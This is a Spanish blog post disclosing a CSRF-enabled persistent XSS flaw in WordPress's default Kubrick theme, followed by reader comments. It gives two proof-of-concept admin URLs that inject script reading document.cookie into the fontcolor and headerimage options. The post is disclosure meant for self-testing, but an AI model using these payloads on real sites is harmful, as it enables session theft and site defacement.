Anuncia aquí

XSS en el tema Kubrick de WordPress

Kubrick, tema por omisión de WordPress, es vulnerable a ataques CSRF, esto tiene como consecuencia que un atacante pueda almacenar HTML arbitrario en sus opciones, si alguno de ustedes usa este tema, puede probar los siguientes ejemplos (o variantes) para determinar si su blog se ve afectado o no por este problema.

code:
XSS persistente que sólo funciona en IE
http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&fontcolor=expression(alert(document.cookie))

XSS persistente, funciona en todos los navegadores:
http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&headerimage='--></style><script>alert(document.cookie)</script>

Es muy probable que otros temas también sean vulnerables a este tipo de ataques, por lo cual, si vuestro blog les importa, deben tener cuidado con los plugins y temas que instalan o usan.

Esta entrada fue publicada en CSRF, Seguridad, Web, Wordpress, XSS

3 Comentarios

  1. 1 Carlos Mauricio (27 de abril de 2007, 12:48:04 pm) http://www.dttodo.com

    Hola
    te interesa un intercambio de enlaces¿?
    mi blog es http://www.dttodo.com
    si te interesa pon un enlace a mi blog con el nombre de Dttodo y yo pondre un enlace al tuyo con el nombre que me digas mediante un comentario en mi blog.
    Saludos,

  2. 2 LUIS (27 de abril de 2007, 01:52:47 pm)

    pero solo afecta eso si eres administrador, por que eh probado ese script en varios blog wordpress y todos me redireccionan a su login :P

  3. 3 alex (27 de abril de 2007, 02:03:31 pm) http://www.buayacorp.com

    #1: Este no es el lugar adecuado para hablar de estos temas, hubiera sido mejor que me enviaras un mail; sobre el intercambio de enlaces, nuestras páginas no tienen nada que ver, así que dudo mucho que vaya a servirle a alguno de los dos.

    Luis: Obviamente que si, pero como indico en el texto de la entrada, esto se puede aprovechar usando CSRF.

3 Trackbacks

  1. [...] el tema por omisión de WordPress (Kubrick) son vulnerables. Aunque no lo probé, me parece que es parecido al que reporté hace [...]

  2. [...] omisión de WordPress (Kubrick) son vulnerables. Aunque no lo probé, me parece que es parecido al que reporté hace [...]

  3. [...] el tema por omisión de WordPress (Kubrick) son vulnerables. Aunque no lo probé, me parece que es parecido al que reporté hace [...]

Publicar un Comentario

Tu email nunca será publicado o compartido. Los campos requeridos están marcados con un *

*
*

Puedes usar estas etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>